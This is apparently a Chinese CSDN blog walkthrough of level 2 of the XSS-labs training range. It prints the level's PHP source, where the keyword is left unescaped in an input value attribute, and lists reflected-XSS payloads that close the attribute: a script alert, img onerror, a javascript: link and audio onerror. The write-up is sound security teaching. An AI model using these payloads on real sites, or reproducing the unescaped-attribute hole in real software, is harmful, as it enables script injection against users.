XSS-labs-level2详解

已于 2023-05-23 13:36:06 修改
阅读量174 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss 前端
于 2023-05-23 10:49:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/130806155
版权

访问题目url

我们分析一下代码层面:

当用户在文本框中输入搜索关键字并点击提交按钮时,表单将通过GET方法发送给名为“level2.php”的脚本页面。PHP代码检查URL参数中的“keyword”值,对其进行HTML转义,然后将其用于搜索结果消息中的输出。 

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

我们正常输入然后在网页前端看一下我的输入是否存在问题。

​由此可见我们的输入的恶意代码并没有被网页直接执行,所以我们需要将<input>标签闭合,然后注释掉最后面的”>。

"><script>alert("xss")</script>//

就可以成功绕过,形成反射性xss了

而其他标签法遵循这个原理也可以进行xss

"><img src=x onerror=alert(1)>//
"><a href="javascript:alert(1)">test</a>//
"><audio src=1 onerror=alert(1)>//

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSSxss-labs-level2
Hugu
02-23 462
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS
xss小游戏过关讲解和源码
zdy8023的博客
03-30 1385
最近看视频刚学xss,感觉光看视频,不练习有点脑袋空,便决定网上找一些源码,万幸还是比较容易找的,于是自己搭建环境,并开始了实战之路。 第一关 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;ch...
xss-labs通关攻略教程(level1~level 10)
最新发布
2401_84446787的博客
04-27 633
level 2——闭合标签观察页面提示,发现依然为反射型xss,但是与上一关不同之处在于有了搜索框。尝试添加与上一关相同的参数查看源码,发现和被HTML字符实体化为被HTML字符实体化为猜测在服务器端对keyword这个参数使用了函数,但是value参数中的值未被恶意编码,其中输入的payload被赋值给value,可以考虑闭合value的参数值。">//level 3——单引号闭合并添加事件尝试提交一个随便的参数,查看url中是否有提示输入构造的弹窗测试语句。
DAY18:Xss 靶场通关手册
qq_49433473的博客
07-30 1249
xss-labs 靶场通关手册,超详细
XSS闯关——第二关:level2
老夏家的云
11-09 1979
第二关:level2   输入框内字符为test,屏幕上方提示     所以输入的test被全部传入,payload为4 右键查看网页源代码分析 所以这里需要先将value属性闭合,然后使用javascript脚本调出alert函数过关 //输入代码回车 "&gt;&lt;script&gt;alert('yes')&lt;/script&gt;   回车...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2763
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十关。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
xss-labs通关攻略教程(level1~level 10(1)
m0_60388261的博客
03-18 1020
为了帮助大家更好温习重点知识、更高效的准备面试,特别整理了《前端工程师面试手册》电子稿文件。内容包括html,css,JavaScript,ES6,计算机网络,浏览器,工程化,模块化,Node.js,框架,数据结构,性能优化,项目等等。包含了腾讯、字节跳动、小米、阿里、滴滴、美团、58、拼多多、360、新浪、搜狐等一线互联网公司面试被问到的题目,涵盖了初中级前端技术点。前端面试题汇总开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】JavaScript性能linux。
xss-labs通关攻略教程(level1~level 10(2)
m0_60388292的博客
03-18 620
同样被恶意添加了下划线4. 使用标签来测试,同样href被恶意添加下划线5. 对href尝试大小写绕过6. 查看服务器端源码将get方式传递到服务器端的keyword参数的值赋值给str变量。用字符
[网络安全]xss-labs level-2 解题详析
等风来
08-03 2288
以上为[网络安全]xss-labs level-2 解题详析,后续将分享[网络安全]xss-labs level-3 解题详析。我是秋说,我们下次见。
xss-labs/level-2
m0_71299382的博客
11-28 260
xss-labs/level-2
XSS实战(Level1-10小试牛刀)
Hala
05-15 1520
文章目录XSS实战说明level1level2level3level4level5level6strtolower()函数说明参数范例level7level8HTML实体转码level9PHP strpos()函数定义和用法相关函数:语法技术细节level10总结: XSS实战 说明 环境 Metasploitable2-Linux 步骤: 1. 判断是否存在XSS攻击的可能(提交的内容,页面会显示出来) 2. 判断可输入内容在标签内(属性)还是值 3. 判断闭合(在标签内部的话就需要提前闭合,使XSS
2.level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]
qwsn
12-26 1899
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level2-[本地复现]-[越过wakeup]-[CVE-2016-7124] 1.题目描述 <?php include "flag.php"; class Connection { public $file; public fun
XSS-Labs挑战笔记Level1-10
When you collect everything, you understand nothing.
10-11 3650
靶场下载地址:https://github.com/lyshark/xss-labs 每一关的后台源码重写了alert()方法,只要成功弹框即可进入下一关 Level 1 后台源码: <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" ...
一文了解交易所level1,level2行情
热门推荐
景色正好的专栏
10-04 1万+
现在各大交易所都在不停迭代更新业务,行情种类很多,变化也很快,各种术语让一些初步接触人士晕头转向。然而行情对策略的影响却非常大,试想,如果相似的策略: 对于同一笔行情别人比你提前几十毫秒收到? 一笔行情你只能看到买一卖一,别人却能看到买一到买五,卖一到卖五? 你一秒内收到两笔行情,别人收到的却是四笔行情? 本文将汇总介绍目前国内五大期货交易所,两大证券交易所的行情分发情况。后期也会在博客中持续更新...
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值